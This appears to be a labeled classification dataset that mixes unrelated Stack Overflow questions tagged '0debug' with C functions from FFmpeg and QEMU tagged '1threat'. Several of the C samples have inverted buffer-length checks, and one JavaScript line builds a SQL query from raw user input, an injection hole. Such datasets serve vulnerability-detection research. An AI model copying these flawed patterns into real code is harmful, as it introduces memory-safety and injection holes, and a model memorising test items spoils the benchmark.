<p>When it comes to images which can be duplicated endlessly, such as plain stripes, I have noticed that some websites upload a small 'sample' of the image and then duplicate it with a CSS input such as <code>background-repeat: repeat-x;</code> rather than uploading a larger version which scales according to screen size.</p>
<p>Is this, primarily, a page load speed optimisation exercise, or is there another reason why somebody may wish to do this other than due to the original image being small in the first place?</p>
| 0debug
|
Can't display Cinder, Nova and Neutron info in the Horizon dashboard : I started working with OpenStack and installed it on Ubuntu. After all the configuration, I have a problem displaying the Cinder, Nova and Neutron services in Horizon: [screenshot][1] "error: impossible to get information on nova, cinder, neutron"
[1]: http://i.stack.imgur.com/4MglV.png
| 0debug
|
static int get_nb_samples(AVCodecContext *avctx, const uint8_t *buf,
int buf_size, int *coded_samples)
{
ADPCMDecodeContext *s = avctx->priv_data;
int nb_samples = 0;
int ch = avctx->channels;
int has_coded_samples = 0;
int header_size;
*coded_samples = 0;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_EA_XAS:
if (buf_size < 76 * ch)
nb_samples = 128;
break;
case CODEC_ID_ADPCM_IMA_QT:
if (buf_size < 34 * ch)
nb_samples = 64;
break;
case CODEC_ID_ADPCM_CT:
case CODEC_ID_ADPCM_IMA_EA_SEAD:
case CODEC_ID_ADPCM_IMA_WS:
case CODEC_ID_ADPCM_YAMAHA:
nb_samples = buf_size * 2 / ch;
break;
}
if (nb_samples)
return nb_samples;
header_size = 0;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_4XM:
case CODEC_ID_ADPCM_IMA_ISS: header_size = 4 * ch; break;
case CODEC_ID_ADPCM_IMA_AMV: header_size = 8; break;
case CODEC_ID_ADPCM_IMA_SMJPEG: header_size = 4; break;
}
if (header_size > 0)
return (buf_size - header_size) * 2 / ch;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_EA:
has_coded_samples = 1;
if (buf_size < 4)
*coded_samples = AV_RL32(buf);
*coded_samples -= *coded_samples % 28;
nb_samples = (buf_size - 12) / 30 * 28;
break;
case CODEC_ID_ADPCM_IMA_EA_EACS:
has_coded_samples = 1;
if (buf_size < 4)
*coded_samples = AV_RL32(buf);
nb_samples = (buf_size - (4 + 8 * ch)) * 2 / ch;
break;
case CODEC_ID_ADPCM_EA_MAXIS_XA:
nb_samples = ((buf_size - ch) / (2 * ch)) * 2 * ch;
break;
case CODEC_ID_ADPCM_EA_R1:
case CODEC_ID_ADPCM_EA_R2:
case CODEC_ID_ADPCM_EA_R3:
has_coded_samples = 1;
if (buf_size < 4)
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_EA_R1:
header_size = 4 + 9 * ch;
*coded_samples = AV_RL32(buf);
break;
case CODEC_ID_ADPCM_EA_R2:
header_size = 4 + 5 * ch;
*coded_samples = AV_RL32(buf);
break;
case CODEC_ID_ADPCM_EA_R3:
header_size = 4 + 5 * ch;
*coded_samples = AV_RB32(buf);
break;
}
*coded_samples -= *coded_samples % 28;
nb_samples = (buf_size - header_size) * 2 / ch;
nb_samples -= nb_samples % 28;
break;
case CODEC_ID_ADPCM_IMA_DK3:
if (avctx->block_align > 0)
buf_size = FFMIN(buf_size, avctx->block_align);
nb_samples = ((buf_size - 16) * 8 / 3) / ch;
break;
case CODEC_ID_ADPCM_IMA_DK4:
nb_samples = 1 + (buf_size - 4 * ch) * 2 / ch;
break;
case CODEC_ID_ADPCM_IMA_WAV:
if (avctx->block_align > 0)
buf_size = FFMIN(buf_size, avctx->block_align);
nb_samples = 1 + (buf_size - 4 * ch) / (4 * ch) * 8;
break;
case CODEC_ID_ADPCM_MS:
if (avctx->block_align > 0)
buf_size = FFMIN(buf_size, avctx->block_align);
nb_samples = 2 + (buf_size - 7 * ch) * 2 / ch;
break;
case CODEC_ID_ADPCM_SBPRO_2:
case CODEC_ID_ADPCM_SBPRO_3:
case CODEC_ID_ADPCM_SBPRO_4:
{
int samples_per_byte;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_SBPRO_2: samples_per_byte = 4; break;
case CODEC_ID_ADPCM_SBPRO_3: samples_per_byte = 3; break;
case CODEC_ID_ADPCM_SBPRO_4: samples_per_byte = 2; break;
}
if (!s->status[0].step_index) {
nb_samples++;
buf_size -= ch;
}
nb_samples += buf_size * samples_per_byte / ch;
break;
}
case CODEC_ID_ADPCM_SWF:
{
int buf_bits = buf_size * 8 - 2;
int nbits = (buf[0] >> 6) + 2;
int block_hdr_size = 22 * ch;
int block_size = block_hdr_size + nbits * ch * 4095;
int nblocks = buf_bits / block_size;
int bits_left = buf_bits - nblocks * block_size;
nb_samples = nblocks * 4096;
if (bits_left >= block_hdr_size)
nb_samples += 1 + (bits_left - block_hdr_size) / (nbits * ch);
break;
}
case CODEC_ID_ADPCM_THP:
has_coded_samples = 1;
if (buf_size < 8)
*coded_samples = AV_RB32(&buf[4]);
*coded_samples -= *coded_samples % 14;
nb_samples = (buf_size - 80) / (8 * ch) * 14;
break;
case CODEC_ID_ADPCM_XA:
nb_samples = (buf_size / 128) * 224 / ch;
break;
}
if (has_coded_samples && (*coded_samples <= 0 || *coded_samples > nb_samples))
return AVERROR_INVALIDDATA;
return nb_samples;
}
| 1threat
|
How can I find the size of an image in PHP? : <p>For example, I have an image that is 1.10 MB with dimensions of 1200 * 1600, and I want my images to be at most 100 KB. How can I find the size of this image?</p>
| 0debug
|
static void do_commit(Monitor *mon, const QDict *qdict)
{
int all_devices;
DriveInfo *dinfo;
const char *device = qdict_get_str(qdict, "device");
all_devices = !strcmp(device, "all");
TAILQ_FOREACH(dinfo, &drives, next) {
if (!all_devices)
if (strcmp(bdrv_get_device_name(dinfo->bdrv), device))
continue;
bdrv_commit(dinfo->bdrv);
}
}
| 1threat
|
static int count_contiguous_clusters(int nb_clusters, int cluster_size,
uint64_t *l2_table, uint64_t stop_flags)
{
int i;
uint64_t mask = stop_flags | L2E_OFFSET_MASK | QCOW_OFLAG_COMPRESSED;
uint64_t first_entry = be64_to_cpu(l2_table[0]);
uint64_t offset = first_entry & mask;
if (!offset)
return 0;
assert(qcow2_get_cluster_type(first_entry) != QCOW2_CLUSTER_COMPRESSED);
for (i = 0; i < nb_clusters; i++) {
uint64_t l2_entry = be64_to_cpu(l2_table[i]) & mask;
if (offset + (uint64_t) i * cluster_size != l2_entry) {
break;
}
}
return i;
}
| 1threat
|
static av_always_inline void xchg_mb_border(H264Context *h, H264SliceContext *sl,
uint8_t *src_y,
uint8_t *src_cb, uint8_t *src_cr,
int linesize, int uvlinesize,
int xchg, int chroma444,
int simple, int pixel_shift)
{
int deblock_topleft;
int deblock_top;
int top_idx = 1;
uint8_t *top_border_m1;
uint8_t *top_border;
if (!simple && FRAME_MBAFF(h)) {
if (h->mb_y & 1) {
if (!MB_MBAFF(h))
return;
} else {
top_idx = MB_MBAFF(h) ? 0 : 1;
}
}
if (h->deblocking_filter == 2) {
deblock_topleft = h->slice_table[h->mb_xy - 1 - h->mb_stride] == sl->slice_num;
deblock_top = sl->top_type;
} else {
deblock_topleft = (h->mb_x > 0);
deblock_top = (h->mb_y > !!MB_FIELD(h));
}
src_y -= linesize + 1 + pixel_shift;
src_cb -= uvlinesize + 1 + pixel_shift;
src_cr -= uvlinesize + 1 + pixel_shift;
top_border_m1 = h->top_borders[top_idx][h->mb_x - 1];
top_border = h->top_borders[top_idx][h->mb_x];
#define XCHG(a, b, xchg) \
if (pixel_shift) { \
if (xchg) { \
AV_SWAP64(b + 0, a + 0); \
AV_SWAP64(b + 8, a + 8); \
} else { \
AV_COPY128(b, a); \
} \
} else if (xchg) \
AV_SWAP64(b, a); \
else \
AV_COPY64(b, a);
if (deblock_top) {
if (deblock_topleft) {
XCHG(top_border_m1 + (8 << pixel_shift),
src_y - (7 << pixel_shift), 1);
}
XCHG(top_border + (0 << pixel_shift), src_y + (1 << pixel_shift), xchg);
XCHG(top_border + (8 << pixel_shift), src_y + (9 << pixel_shift), 1);
if (h->mb_x + 1 < h->mb_width) {
XCHG(h->top_borders[top_idx][h->mb_x + 1],
src_y + (17 << pixel_shift), 1);
}
}
if (simple || !CONFIG_GRAY || !(h->flags & CODEC_FLAG_GRAY)) {
if (chroma444) {
if (deblock_top) {
if (deblock_topleft) {
XCHG(top_border_m1 + (24 << pixel_shift), src_cb - (7 << pixel_shift), 1);
XCHG(top_border_m1 + (40 << pixel_shift), src_cr - (7 << pixel_shift), 1);
}
XCHG(top_border + (16 << pixel_shift), src_cb + (1 << pixel_shift), xchg);
XCHG(top_border + (24 << pixel_shift), src_cb + (9 << pixel_shift), 1);
XCHG(top_border + (32 << pixel_shift), src_cr + (1 << pixel_shift), xchg);
XCHG(top_border + (40 << pixel_shift), src_cr + (9 << pixel_shift), 1);
if (h->mb_x + 1 < h->mb_width) {
XCHG(h->top_borders[top_idx][h->mb_x + 1] + (16 << pixel_shift), src_cb + (17 << pixel_shift), 1);
XCHG(h->top_borders[top_idx][h->mb_x + 1] + (32 << pixel_shift), src_cr + (17 << pixel_shift), 1);
}
}
} else {
if (deblock_top) {
if (deblock_topleft) {
XCHG(top_border_m1 + (16 << pixel_shift), src_cb - (7 << pixel_shift), 1);
XCHG(top_border_m1 + (24 << pixel_shift), src_cr - (7 << pixel_shift), 1);
}
XCHG(top_border + (16 << pixel_shift), src_cb + 1 + pixel_shift, 1);
XCHG(top_border + (24 << pixel_shift), src_cr + 1 + pixel_shift, 1);
}
}
}
}
| 1threat
|
ivshmem_server_handle_new_conn(IvshmemServer *server)
{
IvshmemServerPeer *peer, *other_peer;
struct sockaddr_un unaddr;
socklen_t unaddr_len;
int newfd;
unsigned i;
unaddr_len = sizeof(unaddr);
newfd = qemu_accept(server->sock_fd,
(struct sockaddr *)&unaddr, &unaddr_len);
if (newfd < 0) {
IVSHMEM_SERVER_DEBUG(server, "cannot accept() %s\n", strerror(errno));
return -1;
}
qemu_set_nonblock(newfd);
IVSHMEM_SERVER_DEBUG(server, "accept()=%d\n", newfd);
peer = g_malloc0(sizeof(*peer));
peer->sock_fd = newfd;
for (i = 0; i < G_MAXUINT16; i++) {
if (ivshmem_server_search_peer(server, server->cur_id) == NULL) {
break;
}
server->cur_id++;
}
if (i == G_MAXUINT16) {
IVSHMEM_SERVER_DEBUG(server, "cannot allocate new client id\n");
goto fail;
}
peer->id = server->cur_id++;
peer->vectors_count = server->n_vectors;
for (i = 0; i < peer->vectors_count; i++) {
if (event_notifier_init(&peer->vectors[i], FALSE) < 0) {
IVSHMEM_SERVER_DEBUG(server, "cannot create eventfd\n");
goto fail;
}
}
if (ivshmem_server_send_initial_info(server, peer) < 0) {
IVSHMEM_SERVER_DEBUG(server, "cannot send initial info\n");
goto fail;
}
QTAILQ_FOREACH(other_peer, &server->peer_list, next) {
for (i = 0; i < peer->vectors_count; i++) {
ivshmem_server_send_one_msg(other_peer->sock_fd, peer->id,
peer->vectors[i].wfd);
}
}
QTAILQ_FOREACH(other_peer, &server->peer_list, next) {
for (i = 0; i < peer->vectors_count; i++) {
ivshmem_server_send_one_msg(peer->sock_fd, other_peer->id,
other_peer->vectors[i].wfd);
}
}
for (i = 0; i < peer->vectors_count; i++) {
ivshmem_server_send_one_msg(peer->sock_fd, peer->id,
event_notifier_get_fd(&peer->vectors[i]));
}
QTAILQ_INSERT_TAIL(&server->peer_list, peer, next);
IVSHMEM_SERVER_DEBUG(server, "new peer id = %" PRId64 "\n",
peer->id);
return 0;
fail:
while (i--) {
event_notifier_cleanup(&peer->vectors[i]);
}
close(newfd);
g_free(peer);
return -1;
}
| 1threat
|
blkdebug_co_pwritev(BlockDriverState *bs, uint64_t offset, uint64_t bytes,
QEMUIOVector *qiov, int flags)
{
BDRVBlkdebugState *s = bs->opaque;
BlkdebugRule *rule = NULL;
assert(QEMU_IS_ALIGNED(offset, bs->bl.request_alignment));
assert(QEMU_IS_ALIGNED(bytes, bs->bl.request_alignment));
if (bs->bl.max_transfer) {
assert(bytes <= bs->bl.max_transfer);
}
QSIMPLEQ_FOREACH(rule, &s->active_rules, active_next) {
uint64_t inject_offset = rule->options.inject.offset;
if (inject_offset == -1 ||
(inject_offset >= offset && inject_offset < offset + bytes))
{
break;
}
}
if (rule && rule->options.inject.error) {
return inject_error(bs, rule);
}
return bdrv_co_pwritev(bs->file, offset, bytes, qiov, flags);
}
| 1threat
|
How can I find the sum of an array which consists of arrays and numbers : <p>How can I find the sum of an array which consists of arrays and numbers, like this [1,2,3,[4,5,6,[7,8,9],10,11,12],13,14,15]</p>
| 0debug
|
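For the nested-sum entry above, the usual approach is a recursive walk of the structure. The question does not name a language, so this Python sketch is only an illustration of the idea:

```python
def deep_sum(values):
    """Sum numbers in an arbitrarily nested list, e.g. [1, 2, [3, [4]], 5] -> 15."""
    total = 0
    for item in values:
        if isinstance(item, list):
            total += deep_sum(item)   # recurse into nested lists
        else:
            total += item             # plain number, add directly
    return total

print(deep_sum([1, 2, 3, [4, 5, 6, [7, 8, 9], 10, 11, 12], 13, 14, 15]))  # 120
```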
Need help creating a logo using html and css :
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-html -->
<!DOCTYPE html>
<html>
<style>
.hr{
margin-top: 0px;
margin-bottom: 0px;
width: 35%;
}
.logo{
top:0;
left:0;
position: absolute;
}
</style>
<body>
<div class="logo">
<h1>GTD</h1>
<hr>
<h3>Web Design</h3>
</div>
</body>
</html>
<!-- end snippet -->
My only problem is that I can't figure out how to center the text on the line, so that the words sit directly above and below it.
| 0debug
|
void net_rx_pkt_attach_iovec(struct NetRxPkt *pkt,
const struct iovec *iov, int iovcnt,
size_t iovoff, bool strip_vlan)
{
uint16_t tci = 0;
uint16_t ploff = iovoff;
assert(pkt);
pkt->vlan_stripped = false;
if (strip_vlan) {
pkt->vlan_stripped = eth_strip_vlan(iov, iovcnt, iovoff, pkt->ehdr_buf,
&ploff, &tci);
}
pkt->tci = tci;
net_rx_pkt_pull_data(pkt, iov, iovcnt, ploff);
}
| 1threat
|
connection.query('SELECT * FROM users WHERE username = ' + input_string)
| 1threat
|
static inline int retry_transfer_wrapper(URLContext *h, unsigned char *buf, int size, int size_min,
int (*transfer_func)(URLContext *h, unsigned char *buf, int size))
{
int ret, len;
int fast_retries = 5;
int64_t wait_since = 0;
len = 0;
while (len < size_min) {
ret = transfer_func(h, buf+len, size-len);
if (ret == AVERROR(EINTR))
continue;
if (h->flags & AVIO_FLAG_NONBLOCK)
return ret;
if (ret == AVERROR(EAGAIN)) {
ret = 0;
if (fast_retries) {
fast_retries--;
} else {
if (h->rw_timeout) {
if (!wait_since)
wait_since = av_gettime();
else if (av_gettime() > wait_since + h->rw_timeout)
return AVERROR(EIO);
}
av_usleep(1000);
}
} else if (ret < 1)
return (ret < 0 && ret != AVERROR_EOF) ? ret : len;
if (ret)
fast_retries = FFMAX(fast_retries, 2);
len += ret;
if (len < size && ff_check_interrupt(&h->interrupt_callback))
return AVERROR_EXIT;
}
return len;
}
| 1threat
|
Optimal design for database scenario : <p>I am building a system that keeps track of the visits of members to some clubs.</p>
<p>As I see it, I have 2 options to keep track of the visits, just insert one row into the visits table for each visit and when I need the total, I can just select count, when I need to display i can just do a simple select.</p>
<p>The problem, this is going to grow fast and I am sure I will have eventually like millions of rows just in this table.</p>
<p>Can mysql handle this with ease? Or better implement the second option, one row for each member, and store in one of the row cells the total amount of visits and in another cell the last 60 visits (not really more needed).</p>
<p>I guess the answer as to what's better is obvious but I am curious about how much mysql can handle because the previous system implemented 1 row for each visit.</p>
| 0debug
|
static RAMBlock *unqueue_page(RAMState *rs, ram_addr_t *offset,
ram_addr_t *ram_addr_abs)
{
RAMBlock *block = NULL;
qemu_mutex_lock(&rs->src_page_req_mutex);
if (!QSIMPLEQ_EMPTY(&rs->src_page_requests)) {
struct RAMSrcPageRequest *entry =
QSIMPLEQ_FIRST(&rs->src_page_requests);
block = entry->rb;
*offset = entry->offset;
*ram_addr_abs = (entry->offset + entry->rb->offset) &
TARGET_PAGE_MASK;
if (entry->len > TARGET_PAGE_SIZE) {
entry->len -= TARGET_PAGE_SIZE;
entry->offset += TARGET_PAGE_SIZE;
} else {
memory_region_unref(block->mr);
QSIMPLEQ_REMOVE_HEAD(&rs->src_page_requests, next_req);
g_free(entry);
}
}
qemu_mutex_unlock(&rs->src_page_req_mutex);
return block;
}
| 1threat
|
How to make a Python loop that runs a C program many times? : I have a C program that I can run from the terminal, but I would like to run it many times in a loop from Python. Someone told me to use the subprocess.call function, but I have trouble understanding how it works.
From the terminal I usually run exactly this ```./grezza_foresta -w /Users/stordd/Desktop/StageI2M/Leiden/text_file/USA.g" -m 5 -e 0 > file_name.g ``` (the -w, -m and -e are options and the > creates a file with the output)
So I tried something like this, based on what I've been told to do.
```
import subprocess
subprocess.call(["g++", "/Users/stordd/Desktop/StageI2M/C/forestenostre/grezza_foresta"])
ntrial = input("How many trials? ")
for i in range(int(ntrial)):
tmp=subprocess.call("/Users/stordd/Desktop/StageI2M/C/forestenostre/grezza_foresta")
print(i,tmp)
```
I'm getting these error : ```ld: warning: ignoring file /Users/stordd/Desktop/StageI2M/Leiden/text_file/USA.g, file was built for unsupported file format ( 0x6E 0x75 0x6D 0x65 0x72 0x6F 0x5F 0x64 0x69 0x5F 0x76 0x65 0x72 0x74 0x69 0x63 ) which is not the architecture being linked (x86_64): /Users/stordd/Desktop/StageI2M/Leiden/text_file/USA.g
How many trials? ld: can't link with a main executable file '/Users/stordd/Desktop/StageI2M/C/forestenostre/grezza_foresta' for architecture x86_64
clang: error: linker command failed with exit code 1 (use -v to see invocation)```
It actually seems to be working in some way but I don't know how to add the options.
| 0debug
|
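For the subprocess entry above, a sketch of how the terminal command could be run in a loop. It assumes grezza_foresta is an already compiled executable (so no g++ step is needed), passes each command-line token as a separate list element, and replaces the shell's > redirection with a stdout file handle; the per-trial output file name is an assumption.

```python
import subprocess

ntrial = int(input("How many trials? "))
for i in range(ntrial):
    # Each command-line token becomes one list element; no shell is involved.
    cmd = [
        "/Users/stordd/Desktop/StageI2M/C/forestenostre/grezza_foresta",
        "-w", "/Users/stordd/Desktop/StageI2M/Leiden/text_file/USA.g",
        "-m", "5",
        "-e", "0",
    ]
    # The shell's "> file_name.g" redirection is replaced by stdout=...
    with open("file_name_%d.g" % i, "w") as out:
        result = subprocess.run(cmd, stdout=out)
    print(i, result.returncode)
```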
static int write_manifest(AVFormatContext *s, int final)
{
DASHContext *c = s->priv_data;
AVIOContext *out;
char temp_filename[1024];
int ret, i;
AVDictionaryEntry *title = av_dict_get(s->metadata, "title", NULL, 0);
snprintf(temp_filename, sizeof(temp_filename), "%s.tmp", s->filename);
ret = avio_open2(&out, temp_filename, AVIO_FLAG_WRITE, &s->interrupt_callback, NULL);
if (ret < 0) {
av_log(s, AV_LOG_ERROR, "Unable to open %s for writing\n", temp_filename);
return ret;
}
avio_printf(out, "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n");
avio_printf(out, "<MPD xmlns:xsi=\"http:
"\txmlns=\"urn:mpeg:dash:schema:mpd:2011\"\n"
"\txmlns:xlink=\"http:
"\txsi:schemaLocation=\"urn:mpeg:DASH:schema:MPD:2011 http:
"\tprofiles=\"urn:mpeg:dash:profile:isoff-live:2011\"\n"
"\ttype=\"%s\"\n", final ? "static" : "dynamic");
if (final) {
avio_printf(out, "\tmediaPresentationDuration=\"");
write_time(out, c->total_duration);
avio_printf(out, "\"\n");
} else {
int update_period = c->last_duration / AV_TIME_BASE;
if (c->use_template && !c->use_timeline)
update_period = 500;
avio_printf(out, "\tminimumUpdatePeriod=\"PT%dS\"\n", update_period);
avio_printf(out, "\tsuggestedPresentationDelay=\"PT%dS\"\n", c->last_duration / AV_TIME_BASE);
if (!c->availability_start_time[0] && s->nb_streams > 0 && c->streams[0].nb_segments > 0) {
time_t t = time(NULL);
struct tm *ptm, tmbuf;
ptm = gmtime_r(&t, &tmbuf);
if (ptm) {
if (!strftime(c->availability_start_time, sizeof(c->availability_start_time),
"%Y-%m-%dT%H:%M:%S", ptm))
c->availability_start_time[0] = '\0';
}
}
if (c->availability_start_time[0])
avio_printf(out, "\tavailabilityStartTime=\"%s\"\n", c->availability_start_time);
if (c->window_size && c->use_template) {
avio_printf(out, "\ttimeShiftBufferDepth=\"");
write_time(out, c->last_duration * c->window_size);
avio_printf(out, "\"\n");
}
}
avio_printf(out, "\tminBufferTime=\"");
write_time(out, c->last_duration);
avio_printf(out, "\">\n");
avio_printf(out, "\t<ProgramInformation>\n");
if (title) {
char *escaped = xmlescape(title->value);
avio_printf(out, "\t\t<Title>%s</Title>\n", escaped);
av_free(escaped);
}
avio_printf(out, "\t</ProgramInformation>\n");
if (c->window_size && s->nb_streams > 0 && c->streams[0].nb_segments > 0 && !c->use_template) {
OutputStream *os = &c->streams[0];
int start_index = FFMAX(os->nb_segments - c->window_size, 0);
int64_t start_time = av_rescale_q(os->segments[start_index]->time, s->streams[0]->time_base, AV_TIME_BASE_Q);
avio_printf(out, "\t<Period start=\"");
write_time(out, start_time);
avio_printf(out, "\">\n");
} else {
avio_printf(out, "\t<Period start=\"PT0.0S\">\n");
}
if (c->has_video) {
avio_printf(out, "\t\t<AdaptationSet id=\"video\" segmentAlignment=\"true\" bitstreamSwitching=\"true\">\n");
for (i = 0; i < s->nb_streams; i++) {
AVStream *st = s->streams[i];
OutputStream *os = &c->streams[i];
if (s->streams[i]->codec->codec_type != AVMEDIA_TYPE_VIDEO)
continue;
avio_printf(out, "\t\t\t<Representation id=\"%d\" mimeType=\"video/mp4\" codecs=\"%s\"%s width=\"%d\" height=\"%d\">\n", i, os->codec_str, os->bandwidth_str, st->codec->width, st->codec->height);
output_segment_list(&c->streams[i], out, c);
avio_printf(out, "\t\t\t</Representation>\n");
}
avio_printf(out, "\t\t</AdaptationSet>\n");
}
if (c->has_audio) {
avio_printf(out, "\t\t<AdaptationSet id=\"audio\" segmentAlignment=\"true\" bitstreamSwitching=\"true\">\n");
for (i = 0; i < s->nb_streams; i++) {
AVStream *st = s->streams[i];
OutputStream *os = &c->streams[i];
if (s->streams[i]->codec->codec_type != AVMEDIA_TYPE_AUDIO)
continue;
avio_printf(out, "\t\t\t<Representation id=\"%d\" mimeType=\"audio/mp4\" codecs=\"%s\"%s audioSamplingRate=\"%d\">\n", i, os->codec_str, os->bandwidth_str, st->codec->sample_rate);
avio_printf(out, "\t\t\t\t<AudioChannelConfiguration schemeIdUri=\"urn:mpeg:dash:23003:3:audio_channel_configuration:2011\" value=\"%d\" />\n", st->codec->channels);
output_segment_list(&c->streams[i], out, c);
avio_printf(out, "\t\t\t</Representation>\n");
}
avio_printf(out, "\t\t</AdaptationSet>\n");
}
avio_printf(out, "\t</Period>\n");
avio_printf(out, "</MPD>\n");
avio_flush(out);
avio_close(out);
return ff_rename(temp_filename, s->filename, s);
}
| 1threat
|
Error : java.util.ArrayList cannot be cast to java.lang.String : <p>When I run my action I get the error:
" java.util.ArrayList cannot be cast to java.lang.String "</p>
<p>and this is my code :</p>
<pre><code> textField_1 = new JTextField();
textField_1.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent e) {
Object selected = list_1.getSelectedValue();
Connection conn = null;
PreparedStatement stmt = null;
String a =null;
try{
conn=DriverManager.getConnection("jdbc:mysql://localhost/flyer","root","000");
String query= " INSERT INTO flyer_item (discount) SELECT price * ? FROM `item` WHERE item_name = `?` ";
Statement st= conn.createStatement();
java.sql.PreparedStatement ps = conn.prepareStatement(query);
ps.setString(1,a);
ps.setString(2,(String) selected);
ps.executeUpdate();
st.executeUpdate(query);
} catch (SQLException se){
System.out.println(se.getMessage());
} }} );
</code></pre>
<p>Any help please ?</p>
| 0debug
|
C# EWS Managed API: How to access shared mailboxes but not my own inbox : <p>How can I connect to an exchange server and read mail from a shared mailbox (one that is not my own "myname@mycompany.com").</p>
<p>Here is my code thus far:</p>
<pre><code>//Create a service
ExchangeService service = new ExchangeService(ExchangeVersion.Exchange2007_SP1);
//Autodiscover end point
service.AutodiscoverUrl("someaddress@mycompany.com");
FindFoldersResults folderSearchResults = service.FindFolders(WellKnownFolderName.Inbox, new FolderView(int.MaxValue));
Microsoft.Exchange.WebServices.Data.Folder exchangeMailbox = folderSearchResults.Folders.ToList().Find(
f => f.DisplayName.Equals("NameOfSharedMailboxIwant", StringComparison.CurrentCultureIgnoreCase));
//Set the number of items we can deal with at anyone time.
ItemView itemView = new ItemView(int.MaxValue);
foreach (Microsoft.Exchange.WebServices.Data.Folder folderFromSearchResults in folderSearchResults.Folders)
{
if (folderFromSearchResults.DisplayName.Equals("NameOfSharedMailboxIWant", StringComparison.OrdinalIgnoreCase))
{
Microsoft.Exchange.WebServices.Data.Folder boundFolder =
Microsoft.Exchange.WebServices.Data.Folder.Bind(service, folderFromSearchResults.Id);
SearchFilter unreadSearchFilter =
new SearchFilter.SearchFilterCollection(
LogicalOperator.And, new SearchFilter.IsEqualTo(
EmailMessageSchema.IsRead, false));
//Find the unread messages in the email folder.
FindItemsResults<Item> unreadMessages = boundFolder.FindItems(unreadSearchFilter, itemView);
foreach (EmailMessage message in unreadMessages)
{
message.Load();
Console.WriteLine(message.Subject);
}
}
</code></pre>
<p>When I run this, I get an exception thrown that says that that "The SMTP address has no mailbox associated with it " during:</p>
<pre><code> Microsoft.Exchange.WebServices.Data.Folder exchangeMailbox = folderSearchResults.Folders.ToList().Find(
f => f.DisplayName.Equals("BA", StringComparison.CurrentCultureIgnoreCase));
</code></pre>
<p>What am I missing? I feel like I am almost there and that this should work according to the EWS Managed API 2.0 documentation, but I</p>
| 0debug
|
static void qemu_rbd_complete_aio(RADOSCB *rcb)
{
RBDAIOCB *acb = rcb->acb;
int64_t r;
r = rcb->ret;
if (acb->cmd == RBD_AIO_WRITE ||
acb->cmd == RBD_AIO_DISCARD) {
if (r < 0) {
acb->ret = r;
acb->error = 1;
} else if (!acb->error) {
acb->ret = rcb->size;
}
} else {
if (r < 0) {
memset(rcb->buf, 0, rcb->size);
acb->ret = r;
acb->error = 1;
} else if (r < rcb->size) {
memset(rcb->buf + r, 0, rcb->size - r);
if (!acb->error) {
acb->ret = rcb->size;
}
} else if (!acb->error) {
acb->ret = r;
}
}
acb->bh = qemu_bh_new(rbd_aio_bh_cb, acb);
qemu_bh_schedule(acb->bh);
g_free(rcb);
}
| 1threat
|
Can't find Package Manager Console in Visual Studio for Mac : <p>I am using Visual Studio for Mac. I need to install some packages but I can't find the Package Manager Console for that.</p>
<p>Visual studio version: Preview 1 (7.0 build 347)</p>
| 0debug
|
static void qemu_chr_parse_udp(QemuOpts *opts, ChardevBackend *backend,
Error **errp)
{
const char *host = qemu_opt_get(opts, "host");
const char *port = qemu_opt_get(opts, "port");
const char *localaddr = qemu_opt_get(opts, "localaddr");
const char *localport = qemu_opt_get(opts, "localport");
bool has_local = false;
SocketAddress *addr;
if (host == NULL || strlen(host) == 0) {
host = "localhost";
}
if (port == NULL || strlen(port) == 0) {
error_setg(errp, "chardev: udp: remote port not specified");
return;
}
if (localport == NULL || strlen(localport) == 0) {
localport = "0";
} else {
has_local = true;
}
if (localaddr == NULL || strlen(localaddr) == 0) {
localaddr = "";
} else {
has_local = true;
}
backend->udp = g_new0(ChardevUdp, 1);
addr = g_new0(SocketAddress, 1);
addr->kind = SOCKET_ADDRESS_KIND_INET;
addr->inet = g_new0(InetSocketAddress, 1);
addr->inet->host = g_strdup(host);
addr->inet->port = g_strdup(port);
addr->inet->has_ipv4 = qemu_opt_get(opts, "ipv4");
addr->inet->ipv4 = qemu_opt_get_bool(opts, "ipv4", 0);
addr->inet->has_ipv6 = qemu_opt_get(opts, "ipv6");
addr->inet->ipv6 = qemu_opt_get_bool(opts, "ipv6", 0);
backend->udp->remote = addr;
if (has_local) {
backend->udp->has_local = true;
addr = g_new0(SocketAddress, 1);
addr->kind = SOCKET_ADDRESS_KIND_INET;
addr->inet = g_new0(InetSocketAddress, 1);
addr->inet->host = g_strdup(localaddr);
addr->inet->port = g_strdup(localport);
backend->udp->local = addr;
}
}
| 1threat
|
Copy highlighted element from <select> using JavaScript : How do I copy the highlighted/selected element from one <select> to another <select> on the click of a button using plain JavaScript, not jQuery?
| 0debug
|
static int decode_residuals(FLACContext *s, int channel, int pred_order)
{
int i, tmp, partition, method_type, rice_order;
int sample = 0, samples;
method_type = get_bits(&s->gb, 2);
if (method_type > 1) {
av_log(s->avctx, AV_LOG_ERROR, "illegal residual coding method %d\n",
method_type);
return -1;
}
rice_order = get_bits(&s->gb, 4);
samples= s->blocksize >> rice_order;
if (pred_order > samples) {
av_log(s->avctx, AV_LOG_ERROR, "invalid predictor order: %i > %i\n",
pred_order, samples);
return -1;
}
sample=
i= pred_order;
for (partition = 0; partition < (1 << rice_order); partition++) {
tmp = get_bits(&s->gb, method_type == 0 ? 4 : 5);
if (tmp == (method_type == 0 ? 15 : 31)) {
tmp = get_bits(&s->gb, 5);
for (; i < samples; i++, sample++)
s->decoded[channel][sample] = get_sbits_long(&s->gb, tmp);
} else {
for (; i < samples; i++, sample++) {
s->decoded[channel][sample] = get_sr_golomb_flac(&s->gb, tmp, INT_MAX, 0);
}
}
i= 0;
}
return 0;
}
| 1threat
|
go lang define custom time format : I am trying to write a custom date format string as required by my application.
Using the Go time module I get the format with a clumsy function (below).
Also, since this function will be called millions of times every day, I want this to be super efficient too. Is there POSIX-style formatting available in Go?
package main
import (
"fmt"
"time"
)
func main() {
t := time.Now()
fmt.Printf("Time now is %d%02d%02d%02d%02d%02d",
t.Year(), t.Month(), t.Day(), t.Hour(), t.Minute(), t.Second())
}
| 0debug
|
SSMS Snippets and Shortcuts : <p>I'm using SSMS 2014. I am able to insert a snippet but they don't seem to respond to shortcuts (ie crproc[tab])</p>
<p>Is this feature known to work?</p>
<pre><code><?xml version="1.0" encoding="utf-8" ?>
